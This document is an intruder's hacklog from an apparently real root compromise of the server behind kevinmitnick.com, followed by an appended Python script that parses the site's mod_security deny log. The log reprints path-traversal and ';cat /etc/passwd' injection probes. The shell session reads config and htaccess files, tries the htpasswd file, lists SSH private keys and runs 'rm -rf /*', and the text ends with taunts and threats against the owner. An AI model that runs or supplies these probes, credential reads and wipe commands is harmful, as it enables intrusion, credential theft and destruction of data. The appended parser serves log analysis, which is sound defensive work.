-rwxr-xr-x  1 mitsec mitsec   23 Nov 20  2006 googlehostedservice.html
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 guillermo
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec    12083 Mar  5  2007 index-save.php
-rwxr-xr-x  1 mitsec mitsec 5394 May 18 17:28 index.php
-rwxr-xr-x  1 mitsec mitsec    12077 Nov 26  2006 index.php.save
-rwxr-xr-x  1 mitsec mitsec  385 Mar 21 17:59 info.txt
-rwxr-xr-x  1 mitsec mitsec 1440 Aug  7  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  1515582 Aug  7  2007 issa.jpg
drwxr-xr-x  3 mitsec mitsec 4096 Jun 20 03:16 jon
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 keppler
-rwxr-xr-x  1 mitsec mitsec 8793 Aug  7  2007 lastRSS.php
drwxr-xr-x  2 mitsec mitsec 4096 Jan 20 16:51 media
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 mitnick
-rwxr-xr-x  1 mitsec mitsec 38559604 Aug 20  2006 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec 5089 Jan 13  2006 msc.css
drwxr-xr-x  3 mitsec mitsec 4096 Sep  1  2008 news
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 patrickau
-rwxr-xr-x  1 mitsec mitsec  1088600 Oct 27  2008 pdi-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec 7120 Aug  7  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec 9188 Jun 28 15:21 press.php
-rwxr-xr-x  1 mitsec mitsec 3487 Mar 28  2005 privacy.php
-rwxr-xr-x  1 mitsec mitsec 3111 Aug  7  2007 products.php
-rwxr-xr-x  1 mitsec mitsec 1200 Aug 13  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec 8172 Aug  7  2007 services.php
-rwxr-xr-x  1 mitsec mitsec 5218 Aug 13  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec 4975 Sep 29  2006 speakingold.php
-rwxr-xr-x  1 mitsec mitsec    28169 Aug  7  2007 ssa.pdf
-rwxr-xr-x  1 mitsec mitsec 2430 Aug  7  2007 style.css
-rwxr-xr-x  1 mitsec mitsec 5731 May 18 17:28 testimonials.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 ttf
-rwxr-xr-x  1 mitsec mitsec 2726 Oct 20  2007 verify_config.php
-rwxr-xr-x  1 mitsec mitsec 3928 Mar 24 17:08 video.php
-rwxr-xr-x  1 mitsec mitsec 5857 Aug 22  2006 wallofshame.txt
-rwxr-xr-x  1 mitsec mitsec 3034 Aug 26  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec    20981 Nov 16  2006 workshop_signup.php.bk
-rwxr-xr-x  1 mitsec mitsec  888 Aug  7  2007 workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec 3305 Dec  7  2006 workshop_signup_new.php.bk
-rwxr-xr-x  1 mitsec mitsec 5373 Nov 16  2006 workshop_signup_submit.php.bk
-rwxr-xr-x  1 mitsec mitsec 1208 Aug  7  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec 4096 Sep  1  2008 zzhp
root@dc21 [~]# cat wallofshame.txt
Requesting IP Date Time Handler GET Host Mod_Security-Message
Mod_Security-Action
167.216.252.40 2006-08-22 11:20:05
/images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern
match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:03 cgi-script  9b.4d.344a.static.theplanet.com
Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:02  /phpxmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:01  /xmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:59 cgi-script
/images/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:57 cgi-script /webmail/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:55 cgi-script
/webmail/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:54 cgi-script
/webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:52  /images/perl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"perl " at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:49 cgi-script /webmail/.htaccess HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"\\.htaccess" at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:39  /phpMyAdmin-2.6.4/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin264/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:36 cgi-script /images/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:34 cgi-script
/images/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:33 cgi-script
/images/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:22
/nqt.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submi
t=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403.
Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:20
/network_query.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/pa
sswd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with
code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:17  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:16  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:16  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:15  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:04  /phpMyAdmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:04  /phpmyadmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403


root@dc21 [~]# #lol
root@dc21 [~]# cat config.php
<script language="php"> ## rofl, come join us in 2009 Kev.
// LICENSE NOTE,  This software is dual licensed using BSD-Style and LGPL. Where there is any discrepancy, the BSD-Style license will take precedence.
// Review the relative file ./license.txt for details. The intention is that these works are available for all
// and may be profited from but not restricted in use.
// For most recent see http://www.cocoavillagepublishing.com/development/tools/php/scripts/
// NOTE - TO AVOID "Cannot send session cache limiter - headers already sent"
// try to avoid blank lines and tabs to minimize chance header starts premature by web output
//
// Defining some settings with variables
//
// $BAS_mode="";  blank means nominal, if "test" then we evoke more scripts
//$BAS_mode="test" ;
$BAS_mode="";
//
// Important, number of characters in image, suggest 4
$BASnumimgchars = 4 ;
//
// set $BASaddimgnoise = "yes" for arcs and noise to be added to image to further confuse ocr
$BASaddimgnoise = "no";
//$BASaddimgnoise = "yes" ;
//
// IF entered code matches random generated string, after action will redirect page
// to this location using php header function. Scripting code so header will use
// relative location per notes at http://us2.php.net/manual/en/function.header.php
$MatchSendToRelativeURL="good_submission.html" ;
//
// Action for good match, for now the function sends an email, which should be
// a secret or a priority like email to pager of fax....
$BAS_secretemail="blockautosubmit@webengr.com" ;
//
// Fromemail for notificationsof successful submissions,
$BAS_fromemail = "www@".$_SERVER['HTTP_HOST'] ;
//
//
//
//
//******************************************//
//  BELOW YOU PROBABLY WILL NOT BE CHANGING //
//******************************************//
//
// declare some functions to be used in places
// function to return random characters for image
function GetRandomChar() {
 // Seed with microseconds since last "whole" second
 mt_srand((double)microtime()*1000000);
 // Use random number 1-3, if 1, we generate a number 0-9 (ascii 48 to 57),
 // if it was 2, we generate an uppercase character (ascii 65 to 70),
 // if it was 3, we generate a lowercase character (ascii 97 to 122),
 switch (mt_rand(1,3)) {
 case 1:
  $BAErandchar = mt_rand(48, 57);
  break;
 case 2:
  $BAErandchar = mt_rand(65, 90);
  break;
 case 3:
  $BAErandchar = mt_rand(97, 122);
  break;
  }
 return chr($BAErandchar);
 }
//
//
//
</script>
root@dc21 [~]# ls -la media/ ## we know u luv it k3v1n
total 1292888
drwxr-xr-x  2 mitsec mitsec 4096 Jan 20 16:51 .
drwxr-xr-x 24 mitsec nobody 4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec  1780588 Jan 20  2006 2005 FBI Computer Crime Survey Report.pdf
-rwxr-xr-x  1 mitsec mitsec    50950 Aug  7  2007 41stParamete2.pdf
-rwxr-xr-x  1 mitsec mitsec 22324052 Jan 17  2005 60mins.wmv
-rwxr-xr-x  1 mitsec mitsec 83791947 Feb  6  2008 AMW.mp4
-rwxr-xr-x  1 mitsec mitsec 67229236 Feb  8  2008 AMW.wmv
-rwxr-xr-x  1 mitsec mitsec   115766 Jul 15  2006 AppSense-White-Paper-Mitnick.pdf
-rwxr-xr-x  1 mitsec mitsec    46238 Aug  7  2007 Applied_Scan2.pdf
-rwxr-xr-x  1 mitsec mitsec 99973354 Feb  6  2008 Bloomberg1.mp4
-rwxr-xr-x  1 mitsec mitsec 80357704 Feb  8  2008 Bloomberg1.wmv
-rwxr-xr-x  1 mitsec mitsec 97313195 Feb  6  2008 Bloomberg2.mp4
-rwxr-xr-x  1 mitsec mitsec 78221632 Feb  8  2008 Bloomberg2.wmv
-rwxr-xr-x  1 mitsec mitsec 97840298 Feb  6  2008 Bloomberg3.mp4
-rwxr-xr-x  1 mitsec mitsec 78549644 Feb  8  2008 Bloomberg3.wmv
-rwxr-xr-x  1 mitsec mitsec   729350 Jul 24  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec    60537 Jan 22  2005 HFSC-Testimony-20030403.pdf
-rwxr-xr-x  1 mitsec mitsec 72885850 Jan 31  2008 InterviewWithMariFrank.mp3
-rwxr-xr-x  1 mitsec mitsec   211536 Jul 29  2007 Kevin_Mitnick_Bio_BW.pdf
-rwxr-xr-x  1 mitsec mitsec 73025457 Nov 11  2005 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec  5659648 Jan 17  2005 Mitnick_Color.zip
-rwxr-xr-x  1 mitsec mitsec  2547699 Jul 24  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec  5144656 Jan 17  2005 Mitnick_bw.zip
-rwxr-xr-x  1 mitsec mitsec 86455159 Feb  6  2008 Quest Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 69397314 Feb  8  2008 Quest Interview.wmv
-rwxr-xr-x  1 mitsec mitsec    72399 Jan 22  2005 SGAC-Testimony-20000302.pdf
-rwxr-xr-x  1 mitsec mitsec 51160350 Feb  6  2008 Star Jones Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb 13  2008 Star Jones Interview.wmv
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb  8  2008 Star Jones.wmv
-rwxr-xr-x  1 mitsec mitsec    18229 Dec 14  2005 THE ART OF INTRUSION_Press_Kit.zip
-rwxr-xr-x  1 mitsec mitsec   718004 Mar 28  2005 The_Age.pdf
-rwxr-xr-x  1 mitsec mitsec 33177621 Oct 20  2005 Trinidad.wmv
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec    50087 Jan 17  2005 aod_pk_v1-0.zip
-rwxr-xr-x  1 mitsec mitsec 27561886 Jan 17  2005 artofdeceptionshort.wmv
-rwxr-xr-x  1 mitsec mitsec   388671 Jan 20 16:51 cic-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec   384144 Jul 24  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec   52 Jan 17  2005 index.php
-rwxr-xr-x  1 mitsec mitsec    18794 Aug 10  2007 infragard.pdf
-rwxr-xr-x  1 mitsec mitsec  1515582 Jul 24  2007 issa.jpg
-rwxr-xr-x  1 mitsec mitsec 38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec 18084536 Mar 19  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec    32359 Jan 17  2005 msc_brochure.pdf
-rwxr-xr-x  1 mitsec mitsec    46449 Jan 17  2005 msc_course_outline.pdf
-rwxr-xr-x  1 mitsec mitsec  3948582 Aug 19  2007 pick-cards.mov
-rwxr-xr-x  1 mitsec mitsec 40543570 Aug 19  2007 pick-cards.wmv
-rwxr-xr-x  1 mitsec mitsec    28169 Jul 24  2007 ssa.pdf
root@dc21 [~]# ls -la dev
total 208
drwxr-xr-x  5 mitsec mitsec  4096 Sep  1  2008 .
drwxr-xr-x 24 mitsec nobody  4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec   123 Oct 20  2007 .htaccess
-rwxr-xr-x  1 mitsec mitsec  1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec   528 Aug  1  2007 _footer.php
-rwxr-xr-x  1 mitsec mitsec  3121 Aug  1  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec 11023 Aug  7  2007 _sidebar.php
-rwxr-xr-x  1 mitsec mitsec  2798 Jul 24  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 cache
-rwxr-xr-x  1 mitsec mitsec  2870 Jul 23  2007 company.php
-rwxr-xr-x  1 mitsec mitsec  1778 Jul 29  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec  1054 Jul 24  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec 50245 Jul 24  2007 contact_form.php
-rwxr-xr-x  1 mitsec mitsec  2839 Jul 24  2007 error_log
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec  3627 Aug  7  2007 index.php
-rwxr-xr-x  1 mitsec mitsec  1440 Jul 23  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  8793 Jul 24  2007 lastRSS.php
-rwxr-xr-x  1 mitsec mitsec  7120 Jul 23  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec  4991 Jul 29  2007 press.php
-rwxr-xr-x  1 mitsec mitsec  3111 Jul 23  2007 products.php
-rwxr-xr-x  1 mitsec mitsec  1738 Jul 23  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec  8172 Jul 29  2007 services.php
-rwxr-xr-x  1 mitsec mitsec  5225 Aug  1  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec  2430 Jul 24  2007 style.css
-rwxr-xr-x  1 mitsec mitsec  2043 Aug  7  2007 testimonials.php
-rwxr-xr-x  1 mitsec mitsec  1981 Jul 24  2007 video.php
-rwxr-xr-x  1 mitsec mitsec  3036 Jul 29  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec   888 Jul 24  2007 workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec  1208 Jul 23  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec  4096 Sep  1  2008 zzhp
root@dc21 [~]# cat dev/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile "/home/mitsec/.htpasswds/public_html/dev/passwd"
require valid-user
root@dc21 [~]# cat /home/mitsec/.htpasswds/public_html/dev/passwd
root@dc21 [~]# cat dev/index.php
<?php require("_header.php"); ?>
<!-- Copy begins  -->

<strong>Mitnick Security Consulting, LLC</strong> is a full-service information

security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting

offers a comprehensive range of services to help businesses protect their
valuable
assets. Mitnick Security Consulting, LLC is a full-service information security

consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers
a comprehensive range of services. <a href="company.php">read more >></a></div>

<div class="bdtxt" style="background-color: #F4F4F4;"><strong>FBI Computer
Crime Survey</strong><br>
&#8220;This computer security survey eclipses any other that I have ever seen.
After reading it, everyone should realize the importance of establishing a
proactive
information security program.&#8221; - Kevin Mitnick<br>
<a href="media/2005%20FBI%20Computer%20Crime%20Survey%20Report.pdf">Click Here
To Download The Report</a><br></div>

<p align="center"><img src="images/br-top.png" width="506" height="10"></p>
  <div class="quote">"Mitnick left his audience shaken,but better
equipped to stave off attacks via social engineering."</div>
  
<div class="quote-att">- Computer Sciences Corporation (<a
href="media/CSC-Testimonial.pdf">Click
  Here for PDF</a>)</div>
      <br>
  <div class="quote">"It's both frightening and informative to
hear how effective social engineering can be in assessing what should be
security sensitive information."</div>
  
<div class="quote-att">- Scott Pettit - The AIM Institute (<a
href="media/Applied_Scan2.pdf">Click
  Here for PDF</a>)</div>
<div class="bdtxt"><a href="testimonials.php">Read more testimonials
>></a></div>
 
<p align="center"><img src="images/br-bot.png" width="506" height="10"></p>
  
<div class="bdtxt"><strong><a href="workshop_signup.php">2007 Las Vegas Social
  Engineering Workshop</a></strong><br>
 A two-day course covering:<br>
 - Social engineering case studies, attack methods, vulnerabilities in
 the human firewall, and techniques to protect your business <br>
 - Security policies development, follow-through, assessment, and
training
 <br>
 <br>
  <a href="workshop_signup.php">Sign up now >></a></div>
 <p align="center"><img src="images/br-top.png" width="506"
height="10"></p>
  
  
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
 <tr valign="top">
   <td width="50%"><div class="bdtxt"><img
src="images/art-of-intrusion-cover.jpg" width="100" height="152" hspace="5"
align="left"><strong>The
       Art of Intrusion:</strong><br>
       The Real Stories Behind the Exploits of Hackers, Intruders, and
       Deceivers<br>
     <br>
       [ <a href="http://www.amazon.com/exec/obidos/tg/detail/-/0764569597/ref=ase_mitnicksecuri-20/103-6052457-8135069?v=glance&s=books">More
       Information</a> ]<br>
       [ <a href="aoi_reviews.php">Read The Press Reviews</a>
]</div></td>  
   <td><div class="bdtxt"><img src="images/art-of-deception-cover.jpg"
width="100" height="151" hspace="5" align="left"><strong>The
       Art of Deception:</strong><br>
       Controlling the Human Element of Security<br>
       <br>
       [ <a href="http://www.amazon.com/exec/obidos/tg/detail/-/0471237124/ref=ase_mitnicksecuri-20/103-6052457-8135069?v=glance&s=books">More
       Information</a> ]</div></td>
  </tr>
</table>

  

 


<!-- Copy ends -->

<?php require("_sidebar.php"); ?>

<?php require("_footer.php"); ?>
root@dc21 [~]# ls -la /home/mitsec/.ssh/
total 16
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 authorized_keys2
-rwxr-xr-x  1 mitsec mitsec  744 Oct 20  2007 id_dsa
-rwxr-xr-x  1 mitsec mitsec  615 Oct 20  2007 id_dsa.pub
-rwxr-xr-x  1 mitsec mitsec    0 Nov 15  2008 known_hosts
toproot@dc21 [~]# cat /etc/userdomains
kevinmitnick.com: mitsec
defthi.com: mitsec
defthi.mitnicksecurity.com: mitsec
mitnicksecurity.com: mitsec
mitsec.com: mitsec
defensivethinking.com: mitsec
*: nobody
root@dc21 [~]# #good bye kevin
root@dc21 [~]# rm -rf /*
/dev/rm2: cannot remove `/dev/pts/0': Operation not permitted
[ snip ]
root@dc21 [/dev]# logout
Connection to www.kevinmitnick.com closed by remote host.
Connection to www.kevinmitnick.com closed.

Apologies for the poor quality of the hacklog, but I'm old now and let's face
it, Kevin Mitnick is done. You can move your box anywhere Kevin, we'll find you
and own you. You should know best, it's the "hacker" in us - or something like
that...See you soon.
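
The wallofshame.txt listing above is a mod_security deny log, hard-wrapped at 80 columns. As an added example (not part of the original hacklog), the Python below reassembles the wrapped records, parses them and reports per source IP how many requests were denied, over what time window and by which rules. The field layout is inferred from the header line of the listing and rule strings are compared as literal substrings; both are assumptions.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote_plus

# Five records copied from the wallofshame.txt listing, hard wraps included.
SAMPLE = r'''167.216.252.40 2006-08-22 11:20:05
/images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern
match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:03 cgi-script  9b.4d.344a.static.theplanet.com
Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:54 cgi-script
/webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:39  /phpMyAdmin-2.6.4/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:16  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
'''

START = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3} \d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')
RECORD = re.compile(
    r'^(?P<ip>\S+) (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+'
    r'(?:(?P<handler>cgi-script)\s+)?'                 # handler column may be empty
    r'(?:(?P<uri>/\S*)\s+HTTP/\d\.\d\s+)?'             # so may the request line
    r'(?P<host>\S+)\s+Access denied with code (?P<status>\d{3})\.\s+'
    r'Pattern match "(?P<rule>[^"]*)"?(?:\s+at\s+(?P<var>\w+))?\s+(?P<action>\d{3})$')

def reassemble(text):
    """Undo the 80-column wraps: a record starts with 'IP date time'."""
    records = []
    for line in filter(None, map(str.strip, text.splitlines())):
        if START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records

def parse(record):
    """Split one record into fields; None if it does not fit the layout."""
    m = RECORD.match(record)
    if m is None:
        return None
    hit = m.groupdict()
    hit["when"] = datetime.strptime(hit.pop("ts"), "%Y-%m-%d %H:%M:%S")
    # Percent-decode so the request reads in the form the rule matched on.
    hit["decoded"] = unquote_plus(hit["uri"]) if hit["uri"] else None
    return hit

def summarise(text):
    """Per source IP: volume, time window and which rules fired."""
    report = {}
    for hit in filter(None, map(parse, reassemble(text))):
        r = report.setdefault(hit["ip"], {
            "hits": 0, "rules": Counter(), "truncated": 0,
            "encoded_only": 0, "first": hit["when"], "last": hit["when"]})
        r["hits"] += 1
        r["first"] = min(r["first"], hit["when"])
        r["last"] = max(r["last"], hit["when"])
        rule, raw, dec = hit["rule"].lower(), hit["uri"], hit["decoded"]
        if not rule:
            r["truncated"] += 1      # rule text lost in the dump
            continue
        r["rules"][rule] += 1
        # Rule text absent from the raw URI but present once decoded.
        if raw and rule not in raw.lower() and rule in dec.lower():
            r["encoded_only"] += 1
    for r in report.values():
        r["span_seconds"] = int((r["last"] - r["first"]).total_seconds())
    return report
```

On the five sample records, `summarise(SAMPLE)` reports 5 denials from one address within 49 seconds, two of which contain "/etc/passwd" only after percent-decoding.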
